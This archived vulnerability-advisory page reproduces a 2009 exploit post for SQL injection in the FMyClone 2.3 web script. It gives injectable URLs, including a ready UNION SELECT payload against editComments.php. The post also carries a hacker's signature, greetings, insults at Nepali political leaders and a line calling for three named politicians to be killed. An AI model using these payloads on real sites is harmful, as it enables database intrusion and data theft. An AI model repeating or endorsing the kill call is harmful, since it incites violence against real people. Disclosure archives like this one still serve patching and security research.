FMyClone 2.3 Multiple SQL Injection Vulnerabilities

2009-09-23 / 2009-09-24
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


Ogólna skala CVSS: 6.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 8/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Jednorazowa
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

##################################### # FMyClone V2.3 Multiple SQLi # # By learn3r hacker from nepal # # damagicalhacker@gmail.com # ##################################### Product name: FMyClone Version: 2.3 or maybe lower Home: fmyclone.com Different things might require some privileges to work but still sometimes these might be useful. Vulns in the scripts: http://localhost/exploit/FMyClone%20V2.3/index.php?comp=[SQLi/BSQL] http://localhost/exploit/FMyClone V2.3/edit.php?act=comment&comp=2&id=[SQLi] //requires admin privilege http://localhost/exploit/FMyClone%20V2.3/editComments.php?comp=1%27+union+all+select+1,2,@@version,4,5,6,7,8,9,10,11--+ And maybe there are more vulns in the scripts but I don't have time to analyze (Dashain, Exams and all on the head). Greetz to: sToRm and m0nkee from #gny, sam207 from www.sampctricks.blogspot.com, nepali boka, l@d0_put! HaCKeR and all... FuCK MaKuNe, G!r!ja, Prachanda and all political leaders of Nepal K!ll Parmananda Jha, Upendra Yadav and Vijay Gachhedhaar By learn3r aka cyb3r lord Nepali Hackerz Are Not Dead!!!

Referencje:

http://xforce.iss.net/xforce/xfdb/53330
http://xforce.iss.net/xforce/xfdb/53329
http://www.milw0rm.com/exploits/9711
http://secunia.com/advisories/36778
http://osvdb.org/58184
http://osvdb.org/58183
http://osvdb.org/58182


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top